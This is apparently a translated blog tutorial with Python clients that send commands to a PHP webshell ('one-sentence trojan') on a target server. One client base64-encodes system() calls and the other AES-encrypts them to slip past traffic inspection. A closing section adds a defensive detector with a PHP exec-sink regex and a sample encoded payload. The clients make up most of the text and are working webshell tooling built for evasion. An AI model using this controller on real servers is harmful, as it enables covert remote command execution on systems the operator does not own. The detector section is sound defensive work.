I have written two articles before, but not much:
Using Python to connect to a JSP one-sentence trojan
Using burpsuite to capture Python's POST request
I remembered them today, so I am integrating the two and adding another layer of encryption.
First, write a "two-sentence" trojan in the Linux virtual machine.
It base64-decodes the received parameter before executing it, which means the Windows host needs to base64-encode the command it sends.
import requests
import base64

url = str(input('Target URL: '))           # http://192.168.xxx.xxx/shell.php
pwd = str(input('Connection password: '))  # actually the name of the variable the trojan reads from the POST body

# proxy so that burpsuite can capture the request
proxy = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080'
}

while True:
    cmd = input('Enter the command to execute: ')
    send = "system('" + cmd + "');"
    # the trojan base64-decodes the parameter, so encode the PHP snippet here
    connect = base64.b64encode(send.encode('utf-8'))
    # pass the command to the one-sentence trojan
    payloads = {
        pwd: connect
    }
    # send the POST request to the target url
    # response = requests.post(url, payloads)
    response = requests.post(url, payloads, proxies=proxy)
    # echo the result of the command execution
    print(response.text)
The results are as follows:
Decode the captured parameter and you can see the command.
Then forward the packet; the Python code receives the returned data.
Modify shell.php accordingly so that it decrypts the parameter instead of only base64-decoding it.
The Python code is as follows:
import requests
import base64
from Crypto.Cipher import AES

# secret key (key), initialization vector (iv), CBC-mode encryption
BLOCK_SIZE = 16  # bytes

# PKCS#7 padding on bytes (not on str): padding by character count would break
# for multi-byte UTF-8 commands, because AES needs the byte length to be a multiple of 16
def pad(s):
    n = BLOCK_SIZE - len(s) % BLOCK_SIZE
    return s + bytes([n]) * n

def unpad(s):
    # the last byte holds the number of padding bytes
    return s[:-s[-1]]

key = '5c47c819bpt3apr0'  # 16 bytes -> AES-128; must be the same value used in shell.php
iv = '0102030405060708'   # 16 bytes; must be the same value used in shell.php

def AES_Encrypt(key, data):
    # pad the plaintext to a whole number of blocks
    data = pad(data.encode('utf8'))
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, iv.encode('utf8'))
    encryptedbytes = cipher.encrypt(data)
    # encryption yields bytes; base64-encode them and return a str
    encodestrs = base64.b64encode(encryptedbytes)
    enctext = encodestrs.decode('utf8')
    return enctext

def AES_Decrypt(key, data):
    data = data.encode('utf8')
    # base64-decode the ciphertext back to raw bytes
    encodebytes = base64.decodebytes(data)
    cipher = AES.new(key.encode('utf8'), AES.MODE_CBC, iv.encode('utf8'))
    text_decrypted = cipher.decrypt(encodebytes)
    # strip the padding
    text_decrypted = unpad(text_decrypted)
    text_decrypted = text_decrypted.decode('utf8')
    print(text_decrypted)
    return text_decrypted

if __name__ == '__main__':
    url = str(input('Target URL: '))           # http://192.168.223.xxx.xxx/shell.php
    pwd = str(input('Connection password: '))  # actually the name of the variable the trojan reads from the POST body

    # proxy so that burpsuite can capture the request
    proxy = {
        'http': '127.0.0.1:8080',
        'https': '127.0.0.1:8080'
    }

    while True:
        cmd = input('Enter the command to execute: ')
        send = "system('" + cmd + "');"
        # pass the command to the one-sentence trojan, encrypted instead of only base64-encoded
        payloads = {
            pwd: AES_Encrypt(key, send)
        }
        # send the POST request to the target url
        # response = requests.post(url, payloads)
        response = requests.post(url, payloads, proxies=proxy)
        # echo the result of the command execution
        print(response.text)
The code for these encryption and decryption routines is easy to find on the Internet.
You can also modify it yourself.
Results obtained after capturing packets:
When using AES with Python on Windows, install the pycryptodome module:
pip install pycryptodome
When using AES with Python on Linux, install the pycrypto module:
pip install pycrypto
Note that pycrypto has not been maintained since 2013; pycryptodome exposes the same Crypto.Cipher namespace and installs on Linux as well, so it is the safer choice on both systems.
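From the defender's side, the two clients above leave different traces in a packet capture: the first sends base64 of a PHP system() call, the second sends an opaque AES-CBC blob. The following is an added example, not the article's code, of a triage check run over constructed POST bodies; the field name 'pass' and the sample command are assumptions, and the PHP sink list generalises beyond the system() call the clients build.

```python
import base64
import math
import re
from collections import Counter
from urllib.parse import parse_qsl, quote

# PHP execution sinks a one-sentence trojan wraps around the operator's command; the page's
# client only builds system('...'), the pattern generalises to the other usual sinks.
PHP_EXEC_RE = re.compile(r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\s*\(")
ENTROPY_THRESHOLD = 3.5  # bits/byte: 16 random bytes score near 4.0, base64'd ASCII text lower

def try_b64(value: str):
    """Return the decoded bytes if value is strictly valid base64, otherwise None."""
    try:
        return base64.b64decode(value, validate=True)
    except ValueError:  # binascii.Error (bad alphabet or padding) is a ValueError subclass
        return None

def shannon_entropy(data: bytes) -> float:
    """Bits of entropy per byte of data (0.0 for empty input)."""
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values()) if n else 0.0

def classify_post_body(body: str):
    """Inspect each form field of a POST body and return [(field, verdict), ...].
    'php-exec-in-base64' matches the first (base64) client; 'possible-block-cipher-blob' is the
    only wire-level hint the AES-CBC client leaves (length multiple of 16, high entropy): triage only."""
    findings = []
    for field, value in parse_qsl(body, keep_blank_values=True):
        raw = try_b64(value)
        if raw is None or len(raw) < 8:  # short or not base64: ordinary form data
            continue
        text = raw.decode("utf-8", errors="replace")
        if PHP_EXEC_RE.search(text):
            findings.append((field, "php-exec-in-base64"))
        elif len(raw) % 16 == 0 and shannon_entropy(raw) > ENTROPY_THRESHOLD:
            findings.append((field, "possible-block-cipher-blob"))
    return findings

# Constructed sample bodies, not captured traffic; the field name 'pass' is an assumption.
CONSTRUCTED_BLOB = bytes(range(0, 256, 8))  # 32 bytes standing in for two AES-CBC ciphertext blocks
SAMPLE_BODIES = [
    "pass=c3lzdGVtKCdpZCcpOw%3D%3D&page=home",  # base64 of system('id'); as the first client sends
    "pass=" + quote(base64.b64encode(CONSTRUCTED_BLOB).decode()) + "&page=home",
    "q=hello&page=1",  # benign form post
]

def scan_bodies(bodies):
    return [classify_post_body(b) for b in bodies]
```

The entropy rule will also fire on legitimate binary uploads or tokens whose length happens to be a multiple of 16, so it is a hint for further inspection, not a verdict.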